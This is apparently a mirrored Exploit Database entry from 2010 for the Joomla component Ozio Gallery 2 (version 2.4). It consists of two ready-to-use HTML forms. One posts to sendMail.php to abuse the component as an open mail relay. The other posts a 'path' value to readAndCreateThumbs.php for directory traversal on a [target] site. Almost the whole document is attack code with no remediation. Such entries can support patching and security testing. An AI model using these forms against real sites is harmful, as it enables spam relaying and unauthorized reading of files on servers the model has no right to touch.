Joomla! Component Ozio Gallery 2 – Multiple Vulnerabilities

• Exploit Database
• 13 阅读

• 作者： jdc
  日期： 2010-06-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13925/

• <!--
  # Exploit Title: Joomla Component Ozio Gallery 2 Multiple Vulnerabilities
  # Date: 28 May 2010
  # Author: jdc
  # Software Link: 
  http://extensions.joomla.org/extensions/photos-a-images/photo-flash-gallery/4883
  # Version: 2.4
  # Tested on: PHP5, MySQL5
  -->
  
  <h2>Ozio Gallery 2</h2>
  <h3>v 2.4</h3>
  
  <h4>Open Mail Relay:</h4>
  
  <form method="post" 
  action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/others/sendMail.php">
  <label for="to">To:</label><input id="to" name="to" type="text" /><br />
  <label for="from">From:</label><input id="from" name="from" type="text" 
  /><br />
  <label for="subject">Subject:</label><input id="subject" name="subject" 
  type="text" /><br />
  <label for="message">Message:</label><textarea id="message" 
  name="message"></textarea><br />
  <input type="submit" value="Send"/>
  </form>
  
  
  <h4>Directory Traversal:</h4>
  
  <form method="post" 
  action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/readAndCreateThumbs.php">
  <label for="path">path:</label><input id="path" name="path" type="text" 
  /><br />
  <input type="submit" value="Send"/>
  </form>